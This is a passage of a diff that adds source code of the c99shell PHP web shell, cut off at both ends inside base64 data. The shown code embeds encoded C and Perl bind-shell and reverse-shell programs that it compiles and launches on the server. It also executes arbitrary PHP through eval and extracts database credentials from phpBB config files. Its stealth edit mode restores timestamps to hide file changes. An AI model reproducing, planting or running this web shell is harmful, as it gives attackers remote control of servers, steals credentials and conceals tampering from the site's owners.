+"CiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk7DQogICBy". +"ZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1Zikp". +"DQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byBjOTlzaGVsbCAmJiAvYmluL2Jhc2ggLWkiKTsN". +"CiAgIGVsc2UNCiAgIGZwcmludGYoc3RkZXJyLCJTb3JyeSIpOw0KICAgY2xvc2UobmV3ZmQpOw0K". +"ICB9DQogfQ0KfQ0KaW50IGNocGFzcyhjaGFyICpiYXNlLCBjaGFyICplbnRlcmVkKSB7DQppbnQg". +"aTsNCmZvcihpPTA7aTxzdHJsZW4oZW50ZXJlZCk7aSsrKSANCnsNCmlmKGVudGVyZWRbaV0gPT0g". +"J1xuJykNCmVudGVyZWRbaV0gPSAnXDAnOyANCmlmKGVudGVyZWRbaV0gPT0gJ1xyJykNCmVudGVy". +"ZWRbaV0gPSAnXDAnOw0KfQ0KaWYgKCFzdHJjbXAoYmFzZSxlbnRlcmVkKSkNCnJldHVybiAwOw0K". +"fQ==", +"c99sh_backconn.pl"=> +"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ". +"HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ". +"DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ". +"HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L". +"CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd". +"GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka". +"WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO". +"iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR". +"VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK". +"FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==", +"c99sh_backconn.c"=> +"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5l". +"dGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZk". +"Ow0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJybSAtZiAiOyANCiBk". +"YWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0g". +"aHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihh". +"cmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJsZW4oYXJndlsy". +"XSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsg". +"DQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1". +"Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7DQogICBleGl0". +"KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIo". +"ZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwi". +"c2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==" +); + $bndportsrcs = array( +"c99sh_bindport.pl"=>array("Using PERL","perl %path %port"), +"c99sh_bindport.c"=>array("Using C","%path %port %pass") +); + $bcsrcs = array( +"c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"), +"c99sh_backconn.c"=>array("Using C","%path %host %port") +); + if ($win) {echo "Binding port and Back connect:
    This functions not work in Windows!

    ";} + else + { + if (!is_array($bind)) {$bind = array();} + if (!is_array($bc)) {$bc = array();} + if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;} + if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;} + if (empty($bc["host"])) {$bc["host"] = $REMOTE_ADDR;} + if (!is_numeric($bc["port"])) {$bc["port"] = $bindport_port;} + if (!empty($bindsubmit)) + { + echo "Result of binding port:
    "; + $v = $bndportsrcs[$bind["src"]]; + if (empty($v)) {echo "Unknown file!
    ";} + elseif (fsockopen($SERVER_ADDR,$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!
    ";} + else + { + $srcpath = $tmpdir.$bind["src"]; + $w = explode(".",$bind["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $binpath = $tmpdir.join(".",$w); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";} + else + { + $data = base64_decode($bndsrcs[$bind["src"]]); + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%port",$bind["port"],$v[1]); + $v[1] = str_replace("%pass",$bind["pass"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + sleep(5); + $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5); + if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";} + else {echo "Binding... ok! Connect to ".$SERVER_ADDR.":".$bind["port"]."! You should use NetCat©, run \"nc -v ".$SERVER_ADDR." ".$bind["port"]."\"!
    View binder's process
    ";} + } + echo "
    "; + } + } + if (!empty($bcsubmit)) + { + echo "Result of back connection:
    "; + $v = $bcsrcs[$bc["src"]]; + if (empty($v)) {echo "Unknown file!
    ";} + else + { + $srcpath = $tmpdir.$bc["src"]; + $w = explode(".",$bc["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $binpath = $tmpdir.join(".",$w); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";} + else + { + $data = base64_decode($bndsrcs[$bind[src]]); + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%host",$bc[host],$v[1]); + $v[1] = str_replace("%port",$bc[port],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + echo "Now script try connect to ".$bc["host"].":".$bc["port"]."...
    "; + } + } + } + ?>Binding port:
    Port:  Password:   
    +Back connection:
    HOST:  Port:   
    +Click "Connect" only after open port for it. You should use NetCat©, run "nc -l -n -v -p <port>"!Processes:

    "; + if ($win) {echo "This function not work in Windows!

    ";} + else + { + if ($pid) + { + if (!$sig) {$sig = 9;} + echo "Sending signal ".$sig." to #".$pid."... "; + $ret = posix_kill($pid,$sig); + if ($ret) {echo "ok. he is dead, amen.";} + else {echo "ERROR.";} + } + $ret = myshellexec("ps -aux"); + if (!$ret) {echo "Can't execute \"ps -aux\"!";} + else + { + $ret = htmlspecialchars($ret); + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $stack = explode("\n",$ret); + $head = explode(" ",$stack[0]); + unset($stack[0]); + if (empty($ps_aux_sort)) {$ps_aux_sort = $sort_default;} + if (!is_numeric($ps_aux_sort[0])) {$ps_aux_sort[0] = 0;} + $k = $ps_aux_sort[0]; + if ($ps_aux_sort[1] != "a") {$y = "";} + else {$y = "";} + for($i=0;$i".$head[$i]."";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo "
    "; + foreach($tab as $k) + { + echo ""; + foreach($k as $v) {echo "";} + echo ""; + } + echo "
    ".$v."
    "; + } + } +} +if ($act == "eval") +{ + if (!empty($eval)) + { + echo "Result of execution this PHP-code:
    "; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { + ob_clean(); + eval($eval); + $ret = ob_get_contents(); + $ret = convert_cyr_string($ret,"d","w"); + ob_clean(); + echo $tmp; + if ($eval_txt) + { + $rows = count(explode(" +",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; + } + else {echo $ret."
    ";} + } + else + { + if ($eval_txt) + { + echo "
    "; + } + else {echo $ret;} + } + @chdir($olddir); + } + else {echo "Execution PHP-code"; if (empty($eval_txt)) {$eval_txt = true;}} + echo "


     Display in text-area 
    "; +} +if ($act == "f") +{ + if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") + { + if (file_exists($d.$f)) {echo "
    Permision denied (".htmlspecialchars($d.$f).")!
    ";} + else {echo "
    File does not exists (".htmlspecialchars($d.$f).")!
    Create
    ";} + } + else + { + $r = @file_get_contents($d.$f); + if (!in_array($ft,array("download","notepad"))) {$r = convert_cyr_string($r,"d","w");} + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + if (empty($ft)) {$ft = $rft;} + $arr = array( + array("","info"), + array("","html"), + array("","txt"), + array("Code","code"), + array("Session","phpsess"), + array("","exe"), + array("SDB","sdb"), + array("","img"), + array("","ini"), + array("","download"), + array("","notepad"), + array("","edit") + ); + echo "Viewing file:     ".$f." (".view_size(filesize($d.$f)).")      ".view_perms_color($d.$f)."
    Select action/file-type:
    "; + foreach($arr as $t) + { + if ($t[1] == $rft) {echo " ".$t[0]."";} + elseif ($t[1] == $ft) {echo " ".$t[0]."";} + else {echo " ".$t[0]."";} + echo " (+) |"; + } + echo "
    "; + if ($ft == "info") + { + echo "Information:"; + if (!$win) + { + echo "
    Path ".$d.$f."
    Size ".view_size(filesize($d.$f))."
    MD5 ".md5_file($d.$f)."
    Owner/Group "; + $tmp = posix_getpwuid(fileowner($d.$f)); + if ($tmp["name"] == "") {echo fileowner($d.$f)."/";} + else {echo $tmp["name"]."/";} + $tmp = posix_getgrgid(filegroup($d.$f)); + if ($tmp["name"] == "") {echo filegroup($d.$f);} + else {echo $tmp['name'];} + } + echo "
    Perms".view_perms_color($d.$f)."
    Create time ".date("d/m/Y H:i:s",filectime($d.$f))."
    Access time ".date("d/m/Y H:i:s",fileatime($d.$f))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d.$f))."

    "; + $fi = fopen($d.$f,"rb"); + if ($fi) + { + if ($fullhexdump) {echo "FULL HEXDUMP"; $str = fread($fi,filesize($d.$f));} + else {echo "HEXDUMP PREVIEW"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} + $n = 0; + $a0 = "00000000
    "; + $a1 = ""; + $a2 = ""; + for ($i=0; $i";} + $a1 .= "
    "; + $a2 .= "
    "; + } + } + //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."
    ";} + echo "
    ".$a0."".$a1."".$a2."

    "; + } + $encoded = ""; + if ($base64 == 1) + { + echo "Base64 Encode
    "; + $encoded = base64_encode(file_get_contents($d.$f)); + } + elseif($base64 == 2) + { + echo "Base64 Encode + Chunk
    "; + $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); + } + elseif($base64 == 3) + { + echo "Base64 Encode + Chunk + Quotes
    "; + $encoded = base64_encode(file_get_contents($d.$f)); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + } + elseif($base64 == 4) + { + $text = file_get_contents($d.$f); + $encoded = base64_decode($text); + echo "Base64 Decode"; + if (base64_encode($encoded) != $text) {echo " (failed)";} + echo "
    "; + } + if (!empty($encoded)) + { + echo "

    "; + } + echo "HEXDUMP: [Full] [Preview]
    Base64: +
    [Encode +[+chunk +[+chunk+quotes +[Decode +

    "; + } + elseif ($ft == "html") + { + if ($white) {@ob_clean();} + echo $r; + if ($white) {exit;} + } + elseif ($ft == "txt") {echo "

    ".htmlspecialchars($r)."
    ";} + elseif ($ft == "ini") {echo "
    "; var_dump(parse_ini_file($d.$f,true)); echo "
    ";} + elseif ($ft == "phpsess") + { + echo "
    ";
    +   $v = explode("|",$r);
    +   echo $v[0]."
    "; + var_dump(unserialize($v[1])); + echo "
    "; + } + elseif ($ft == "exe") + { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($exeftypes as $k=>$v) + { + if (in_array($ext,$v)) {$rft = $k; break;} + } + $cmd = str_replace("%f%",$f,$rft); + echo "Execute file:

    Display in text-area
    "; + } + elseif ($ft == "sdb") {echo "
    "; var_dump(unserialize(base64_decode($r))); echo "
    ";} + elseif ($ft == "code") + { + if (ereg("phpBB 2.(.*) auto-generated config file",$r)) + { + $arr = explode("\n",$r); + if (count($arr == 18)) + { + include($d.$f); + echo "phpBB configuration is detected in this file!
    "; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "Connect to DB

    ";} + else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} + echo "Parameters for manual connect:
    "; + $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'
    ";} + echo "

    "; + } + } + echo "
    "; + if (!empty($white)) {@ob_clean();} + highlight_file($d.$f); + if (!empty($white)) {exit;} + echo "
    "; + } + elseif ($ft == "download") + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".filesize($d.$f)); + header("Content-disposition: attachment; filename=\"".$f."\";"); + echo $r; + exit; + } + elseif ($ft == "notepad") + { + @ob_clean(); + header("Content-type: text/plain"); + header("Content-disposition: attachment; filename=\"".$f.".txt\";"); + echo($r); + exit; + } + elseif ($ft == "img") + { + $inf = getimagesize($d.$f); + if (!$white) + { + if (empty($imgsize)) {$imgsize = 20;} + $width = $inf[0]/100*$imgsize; + $height = $inf[1]/100*$imgsize; + echo "
    Size: "; + $sizes = array("100","50","20"); + foreach ($sizes as $v) + { + echo ""; + if ($imgsize != $v ) {echo $v;} + else {echo "".$v."";} + echo "   "; + } + echo "

    "; + } + else + { + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: ".$inf["mime"]); + readfile($d.$f); + exit; + } + } + elseif ($ft == "edit") + { + if (!empty($submit)) + { + if ($filestealth) {$stat = stat($d.$f);} + if (!is_writable($d.$f) and $autochmod) {@chmod($d.$f,$autochmod);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "Can't write to file!";} + else + { + echo "Saved!"; + fwrite($fp,$nfcontent); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $nfcontent; + } + } + $rows = count(explode(" +",$r)); + if ($rows < 10) {$rows = 10;} + if ($rows > 30) {$rows = 30;} + echo "
      
    "; + } + elseif (!empty($ft)) {echo "
    Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.
    ";} + else {echo "
    Unknown extension (".$ext."), please, select type manually.
    ";} + } +} +} +else +{ + @ob_clean(); + $arrimg = array( +"arrow_ltr"=> +"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". +"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", +"back"=> +"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". +"Wg0JADs=", +"buffer"=> +"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". +"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". +"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", +"change"=> +"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". +"zMshADs=", +"delete"=> +"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". +"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". +"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". +"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". +"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". +"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". +"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". +"jwVFHBgiEGQFIgQasYkcSbJQIAA7", +"download"=> +"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". +"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", +"forward"=> +"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". +"WqsJADs=", +"home"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". +"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". +"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", +"mode"=> +"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". +"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". +"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", +"refresh"=> +"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". +"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". +"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". +"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", +"search"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". +"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". +"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". +"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". +"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", +"setup"=> +"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". +"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". +"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". +"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", +"small_dir"=> +"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". +"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", +"small_unk"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". +"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". +"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". +"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". +"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". +"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". +"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". +"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". +"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". +"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". +"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". +"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". +"yAsokBkQADs=", +"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". +"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", +"sort_asc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". +"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", +"sort_desc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". +"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", +"sql_button_drop"=> +"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". 